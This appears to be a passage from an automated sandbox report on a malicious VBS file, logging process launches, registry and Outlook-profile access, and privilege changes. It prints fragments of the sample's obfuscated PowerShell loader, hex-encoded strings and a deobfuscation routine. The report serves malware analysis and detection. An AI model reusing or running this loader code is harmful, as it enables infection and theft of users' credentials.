{Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1Jump to behavior
          Source: classification engineClassification label: mal96.troj.spyw.evad.winVBS@7/4@2/2
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:304:WilStaging_02
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF825BB00BD pushad ; iretd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF825BB0428 push E95D2E73h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC6629 push ss; retf 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC6638 push ss; retf 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00DAC431 push 00000039h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D452551 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D453450 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45255D push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D453168 push 8140738Fh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45343D push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4533C2 push edi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4524DC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4526F8 push esp; ret
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
